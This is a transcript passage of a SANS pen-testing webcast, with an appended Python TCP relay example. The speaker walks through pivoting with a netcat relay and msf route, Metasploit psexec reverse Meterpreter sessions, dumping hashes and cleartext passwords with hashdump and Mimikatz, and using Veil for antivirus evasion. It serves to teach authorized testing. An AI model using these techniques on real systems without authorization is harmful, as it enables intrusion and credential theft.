listener on port 4545. When that connection comes in, it will deliver to the target machine the Meterpreter payload, which will then execute psexec-style to make a reverse TCP connection back to my own box. Sweet. I then have to go to that Linux machine; remember I have shell on that Linux machine, the one that I'm pivoting through, and I'm going to create my relay. I'm going to call the named pipe msfbackpipe, because I'm using Metasploit, and I'm going to put it in /tmp. By the way, when I'm hacking a Linux machine I like to put stuff in /tmp, because it's just temporary and I can delete it afterwards, and nobody else should be relying on it. It might get me noticed, I admit, but usually the stuff I'm putting in there isn't going to be there for the long term. I then do a mknod msfbackpipe p, because I'm making a FIFO. I have my netcat verbosely listening on local port 4545, pulling its standard input from the named pipe called msfbackpipe. Any data that comes in I'm piping to a netcat client to connect to 10.10.10.10 on port 445, because I have to go to 445; that's where Windows listens for SMB. Any data that comes back I'm going to tee, so it'll display it on the screen and dump it into the msfbackpipe. Once I've got that Linux target set up, I then type exploit, so that Metasploit says I'm going to psexec to remote target 10.10.75.1, remote port 4545, giving it an SMBUser and SMBPass, which gets forwarded through my netcat relay, giving me code execution on 10.10.10.10. It's going to create a service, use the service to run the Meterpreter, the Meterpreter is going to make a connection back to my machine on TCP port 80, and it will then delete the executable and delete the service on 10.10.10.10, and now I have my Meterpreter session. When I type exploit, you'll see it says uploading payload; it's got the executable with the pseudorandom name, and it creates a service to run that, and then it shows me I have a connection coming back to my machine from 10.10.10.10. Cool.

I can then do things like hashdump, which will dump the hashes from the target box, or run hashdump. These are two totally different ways to get hashes from target Windows machines. What hashdump does is it pulls them from a certain area of LSASS memory, and you can see here I got the different hashes for the box. If I do run hashdump, run hashdump tries to pull them from the registry; it's not pulling them from memory. And you say, which of these two techniques is better? Well, run hashdump has less of a chance of crashing the target machine, so run hashdump is safer, because it's just going into the registry in the file system. Well, why wouldn't I always do run hashdump? Well, sometimes there's a host-based IPS that may block it; that's why it's nice to have the option of getting it from memory, although there's more of a chance I would crash it with the hashdump command. So I could do hashdump or run hashdump; either way is good, run hashdump is a little safer. Notice also it says that it's dumping password hints. You know how Windows machines allow you to have password hints, so you can type in there, hey, it's your mother's maiden name, or remember to put the capital T in the password? When you do run hashdump, it'll pull the password hints from the target machine as well. I think it's pretty cool.

All right, next. So what we've got so far is we've used some of the techniques we've described: we've used a netcat relay to pivot through this Linux box, and we've got an existing Meterpreter session coming back on TCP port 80. In this lab in the 560 class we continue going further. What we do is we use msf route (remember, I covered that earlier); we use msf route to pivot any traffic destined for 10.10.10.20. This is another Windows box on the DMZ. See, you can't get to port 445 from your Linux box to this 10.10.10.20 machine, but this machine on the DMZ can. A lot of times they'll allow things like TCP port 445 to different machines within the DMZ, but you can't get to 445 directly; you have to pivot through. So what we're going to do is use this existing Meterpreter session, define an msf route to route through it, and then utilize the native characteristics of 10.10.10.10 so that it can communicate via TCP port 445 using SMB with this other machine, 10.10.10.20. That's going to give us a new Meterpreter session back that we'll load Mimikatz onto, and then dump hashes and passwords that way. All right, so I show you again the picture here. This Linux target we're not using anymore, because we used that just to get into 10.10.10.10. Once we're in 10.10.10.10 we've got this beautiful Meterpreter session that we're going to keep, right? We're going to do msf route to pivot through that session. So I'm going to background my Meterpreter session, and notice it says here backgrounding session 1. Then I double-check: am I at my msf prompt? Yes I am, so I can use the route command here. See, if I use the route command at my Meterpreter prompt I'm altering the routing tables of 10.10.10.10. I don't want to do that; I want to pivot. So at my msf prompt I do route add 10.10.10.20, and then I give it a netmask, and I like to do this where I get very precise: I do 255.255.255.255,

that means any traffic that Metasploit generates for this specific IP address (it's got to match a hundred percent), I want that to be carried through Meterpreter session 1. Then I hit Enter; I've now implemented my pivot. So I can then set my RHOST to 10.10.10.20. Then I set my RPORT to 445. Now I have to set it to 445, because that's where 10.10.10.20 is listening for SMB. Before I didn't have to set it to 445, because I was going through my netcat relay, which was listening on 4545, but now I have to set it to 445 so that I can get to 10.10.10.20. I set my LPORT to 443. The LPORT is where your Meterpreter session is going to communicate back with, and I like to do this: I'll use, like, port 80 for one of them and then port 443 for another one. You could use 80 for all of them if you'd like, or 443 for all of them, but I like to kind of separate them out, and in most environments port 80 or 443 is allowed outbound, which is kind of cool. All right, so I set my RHOST to 10.10.10.20, I set my RPORT to 445, because that's what 10.10.10.10 can communicate with 20 using, I set my LPORT to 443, I show my options to make sure they're all good, and then I type exploit, which is just the most wonderful command of any command-line language ever, right? Now when I do that, it says here that it's uploading a payload, which has that pseudorandom name, because I'm essentially psexec-ing, and it says Meterpreter session 2 opened. Now sometimes it's got a little bit of a bug and it'll say exploit failed, the SMB server did not reply to our request, but as long as you get the Meterpreter prompt, it worked. As long as you have the Meterpreter prompt, yeah, you're in there on 10.10.10.20. So I can show you that here by typing sysinfo. It gives me information like the operating system, hostname, the build type and so forth, and I can do ipconfig and you'll see I am executing on 10.10.10.20 here. So I used my existing Meterpreter session to pivot through to get 10.10.10.20.

Now the Meterpreter session coming back from 10.10.10.20 itself, that's a beautiful thing. To what end? Well, watch this. I'm going to load Mimikatz into my Meterpreter session on 10.10.10.20, so now I can run a command like msv, and watch what msv does. msv pulls information from specific areas of memory on that Windows box to give me LANMAN hashes and NT hashes. Now you might say, but Ed, LANMAN hashes are a thing of the past, they're gone now, right? I mean, it was Windows Vista that eliminated LANMAN hashes by default from the Windows registry. Yeah, from the registry, but I'm pulling these from memory, and you'll see that on a lot of Windows machines, even though you don't have LANMAN hashes in the registry, there's still stuff that has LANMAN hashes in memory. So I always want to use a chance to get LANMAN hashes, because they're much weaker and much easier to crack. In the 560 class we talk about a bunch of different ways to dump these hashes and to crack them. All right, so here I've got some LANMAN hashes and some NT hashes, but if I run the wdigest command it actually shows me the cleartext password of the currently logged-in user on the machine, and the cleartext password will be displayed right on the screen in the output. It's pretty awesome. All right, when I finish I'm going to go ahead and exit this, because I've plundered the target environment. I've done hash dumping from 10.10.10.10, I've gotten credentials, including a cleartext password, from 10.10.10.20, so I'm going to do exit. That exits Meterpreter session 2. If I do a sessions -l to list the sessions, you see I still have Meterpreter session 1 open. I'm going to go ahead and kill that with sessions -k and then give it a session number; that kills the session, and then I can exit. So I've shown you here how we can apply those different ideas that we started the webcast with, to mercilessly pivot throughout the target environment.

So in conclusion, pen testing can help an organization better understand its business risk, and when you do pen testing I strongly advise you to consider pivoting through the target environment, always staying within your scope. In fact, one of the themes of 560 is: pivot mercilessly, always staying within scope and always following rules of engagement. And if you think about what we just covered here in our example, pen testers can take advantage of Metasploit and the awesome Meterpreter payload. You can use psexec for code execution via SMB; that's amazing and wonderful, and I mean, that's just part of the feature set of Windows itself, right? You can use netcat relays as well as msf console route to implement pivots; we just showed you how. And then I can do hashdump in a couple of different ways: I can do the hashdump command, or I can type run hashdump and get hashes from the target box, and run hashdump is safer and will even show me password hints. And I can use Mimikatz, this fantastic tool, to get credentials, and Mimikatz has been fully integrated into the Meterpreter. This is awesome. Know your tools in depth. In fact, another theme of the 560 class is this: it's the ninja theme. In fact, this is the coin from SANS Security 560. I don't show you the side with the cipher on the back, right, but here's the coin that you win if you win the capture the flag, if you're on the top team, and/or if you come to a Coin-a-Palooza, the thing we're going to do at

SANS Pen Test Austin, you win this coin. On the back of the coin, above the cipher, it says this: it's not the weapon that's important, it's the ninja wielding it. Our goal in the SANS 560 class is to help you improve your ninja skills so that you can do effective penetration testing. That's why we have this little inspirational thing on the back of this coin. And again, we should give props to our host and sponsor for this webcast, SANS Pen Test Austin. It's coming up May 18th; that's a little more than a month away, it's like five or six weeks. There's a discount available if you sign up in the next week or two; you can see that on the SANS website. Go to sans.org/pentest2015. It's got six classes, including the 401 class, Security Essentials; it's got the 504 class on incident response and hacker attacks; it's got the 560 class, the one we've been talking about here, and a whole bunch more. We've got three nights of NetWars, we've got one night of CyberCity, so you get to hack into our CyberCity environment and stop terrorist attacks against it, we've got Coin-a-Palooza, so you can earn up to five different SANS pen test coins, and then of course there's the barbecue, which I'm getting kind of hungry for right now. So that'll be in Austin, Texas, May 18th through 23rd.

Let's go ahead and open it up to some questions. You guys have asked some wonderful questions so far. Let me go ahead and see, here we go. Adam says, will AV modules detect the executable dropped by psexec? All right, so here's the deal. If you're using the Microsoft psexec tool, that's the one that you can freely download from Microsoft Sysinternals, antivirus tools tend not to notice that, because it's used as a legitimate system administration tool. If you're using the Metasploit version of psexec, the executable created by the psexec module when you go ahead and launch it, that payload might trigger an antivirus tool. What you'll need to do is encode it in various ways so that it won't, and there's a fantastic tool, Adam, called the Veil framework. It's actually a whole set of tools, and the Veil framework allows you to alter the executable that you'll then launch via Metasploit psexec, and therefore the antivirus tool will effectively be evaded. The Veil framework includes a whole bunch of different techniques and ideas that will alter an executable for antivirus evasion. All right, cool.

Next question is from Dwight: where can the presentation be downloaded? The download on the SANS site errors out. Yes, because we make the slides available for download within 24 hours of delivering the webcast, so the URL that you received to attend this, where you download the slides, will be active within 24 hours. I understand from Trevor it's going to be a little less than 24 hours, but 24 hours is the promise that you'll be able to download these slides. Thank you for your interest in that, Dwight, I appreciate it.

Let's see. Okay, Eric asked a fantastic question: sounds perfect for an external pen test, but what are your thoughts on performing internal pen testing? I recommend you do it. Internal pen testing: you can use the exact techniques we just described; they'll work fine for internal pen tests, especially things like psexec. Once I get access to an internal environment, whether it's because I'm modeling a threat actor that has access to the internal environment or I fight my way in, I'm psexec-ing throughout the internal infrastructure. I do think you should do internal pen tests periodically, because you're modeling a different kind of threat; you're modeling maybe a bad insider, or you're modeling somebody who is determined enough to get through your external defenses. If you do only external pen testing, I think you're missing out on a big piece of the picture, so I strongly encourage you to do internal pen testing. You can use the techniques and the tools we just described, and I think they'll serve you very well.

Let's see here. Yes, Youssef says, can we get a copy of the slides? Those slides will be available at the URL that was provided to you when you registered for this webcast. And you know, another thing to think about for those of you who do pen testing: people will ask me, they say, how can I start doing pen testing? I love this idea of pen testing; how can I do it? And the answer is this. I actually wrote a blog posting about a year and a half ago and it's called "So You Wanna Be a Pen Tester," and it talks about three different ways to get into pen testing. Method number one involves you working for a company and starting to help out with their pen testing. Maybe you're on the security team, maybe you're not; I recommend you just volunteer, saying, look, there should be pen testing done here, who does it? And if they say it's this team, say, I want to help that team, I just want to go help them, I'll do it after hours, just let me analyze maybe some of the stuff they were working on. I'm not going to slow them down, but I just want to start building some skills and helping them out. So you could do that inside your own company. Method two: what you could do is go and join a company that pen tests professionally. It's a reasonable way to do it, but they might have some, you know, sort

of barrier to entry. Method three: you could start doing your own pen tests on the side, but be careful with that; make sure you have appropriate insurance. I in fact talk a little bit about that in the SANS 560 course, and "So You Wanna Be a Pen Tester" is the name of that blog posting, so you can check that kind of thing out.

Let's see, we've got a question here from Michael: do you need root/administrator-level access to pivot via the Meterpreter autoroute? You do not. Can you pivot through a standard Windows user? Yes, you can. So you do not have to have high privileges to implement these pivots, which is actually quite beautiful. Now, if you are pivoting through a Linux machine using the netcat relay I just showed you, if you're going to listen on a port less than 1024 you're going to need root privileges, but if you're going through a Windows box, as long as that port isn't in use you can use it regardless of its port number. So you can autoroute through your pivots; you could do pivots. I did a webcast actually with John Strand about six weeks ago, where I showed you how you could use netsh (let me send this to all): you can use the netsh command to implement some really cool pivot features using built-in features of Windows machines. That particular webcast was called "Pillage the Village Redux"; that was a webcast that John Strand and I did about six weeks ago, and I show you even another way to pivot on Windows boxes using the netsh portproxy capability. It's pretty powerful and really cool stuff.

Let's see, K sends an interesting request: is there an online resource for pen test insurance if I want to pen test as a consultant? I haven't found one, but I do send people to my insurance broker. I know that sounds kind of weird, but I have a wonderful insurance broker who knows the pen testing business, and I've used him for like 12 or 13 years now, and you know, sometimes when my existing insurance policy needs to be renewed he hunts around and finds me a decent price on other pen testing insurance. If you email me, my email address is ed@counterhack.com, if you email me, K, I could hook you up with Anthony; he is my insurance agent. I know it sounds kind of weird, but I really like my insurance agent, because he does a really good job for me, so I think you'll like that.

Let's see, Gurbin asks a question: what's your view on Cobalt Strike? Do you know better red team collaboration tools that may also be run on top of Metasploit? Okay, I love Cobalt Strike; I think it's great stuff. I should point out that Raphael Mudge is a good friend of mine, but that said, I review tools independently of who's my friend and who's not my friend. Cobalt Strike is a commercial tool that runs on top of Metasploit and implements collaboration, so you can have multiple pen testers collaborating using a collaboration server, and you can hand off Meterpreter sessions and other things to each other dynamically. He's also released a free tool called Armitage, and before you go out and buy Cobalt Strike you should definitely check out Armitage (and you send that to all), because it's written in a fashion consistent with Cobalt Strike. Cobalt Strike includes a lot of additional capabilities and features, but Armitage will give you an idea of what it's all about, and I recommend you check out Armitage, and then if you really like that stuff and want some additional features and commercial support, you can go and get Cobalt Strike. Raphael Mudge has also done a comparison of what's in Armitage, the free tool that he makes available, versus what's in Cobalt Strike, and you can find that if you do a Google search of "Armitage vs. Cobalt Strike." I think you'll find it really quite good.

And I see that's bringing us now to the top of the hour; yeah, it's a couple of minutes afterwards. I really do appreciate your time and attention. Thank you; it was such a great thing to be able to talk with you on this webcast. I hope I've given you some ideas that you can use in your next webcast and some references to some resources. If you do need an insurance agent that can help you get some good pen test insurance, email me and I will get back to you with Anthony's contact information. And also, please do check out sans.org/pentest2015; we've got some really cool stuff coming up for you. All right, thanks guys, you have a wonderful afternoon and hope to hear from you soon. Take care. Trevor, you want to close things out?

Thanks, Ed. I would like, yeah, no problem. I would love to say thank you so much to our featured speaker, Ed, for his great presentation and for bringing this content to the SANS community. To our audience, we greatly appreciate you listening in today. For a schedule of all upcoming and archived webcasts, visit sans.org/webcasts. Until next time, take care, and we hope to have you back

again for the next SANS webcast.
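Added example, not part of the webcast or of the SEC560 lab material: the two-way relay Ed builds on the pivot box with mknod, nc and tee (the 0<backpipe trick feeds the target's replies back into the listener) reimplemented in Python for a pivot host that has no netcat. The firewalled target is stood in for by a local echo server instead of an SMB service on 445; the 127.0.0.1 addresses, the ephemeral ports and the sample bytes are constructed for the demo and do not come from the talk.

```python
import socket
import threading


def _pump(src, dst):
    # One direction of the relay: copy bytes from src to dst until src closes,
    # then half-close dst so the far side sees EOF. The nc version needs the
    # named pipe for the return direction; here each direction is a thread.
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_echo_server():
    # Stand-in for the target service (a real one would speak SMB on 445):
    # it echoes whatever it receives. Returns the port it listens on.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))  # assumption: loopback, ephemeral port
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        srv.close()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def start_relay(target_host, target_port):
    # The pivot: listen on the "DMZ box", and for the first client that arrives
    # connect onward to the target and relay both directions. Returns the
    # relay's listening port (the value you would hand to RHOST/RPORT).
    lst = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)

    def run():
        client, _ = lst.accept()
        lst.close()
        target = socket.create_connection((target_host, target_port))
        fwd = threading.Thread(target=_pump, args=(client, target), daemon=True)
        back = threading.Thread(target=_pump, args=(target, client), daemon=True)
        fwd.start()
        back.start()
        fwd.join()
        back.join()
        client.close()
        target.close()

    threading.Thread(target=run, daemon=True).start()
    return lst.getsockname()[1]


def relay_roundtrip(payload):
    # Attacker side: talk to the relay port as if it were the target itself and
    # collect exactly len(payload) bytes that come back through the pivot.
    echo_port = start_echo_server()
    relay_port = start_relay("127.0.0.1", echo_port)
    with socket.create_connection(("127.0.0.1", relay_port)) as s:
        s.sendall(payload)
        got = b""
        while len(got) < len(payload):
            chunk = s.recv(4096)
            if not chunk:
                break
            got += chunk
    return got


if __name__ == "__main__":
    # Constructed sample bytes, not a real SMB request.
    sample = b"\xffSMB constructed sample request"
    print(relay_roundtrip(sample) == sample)
```

Run it and the sample bytes come back unchanged through the relay port. On a real engagement the relay port on the pivot host is what you would give to set RHOST and set RPORT in Metasploit in place of the firewalled target, exactly as with the 4545 listener in the talk; only the relay host needs to reach port 445 on the target.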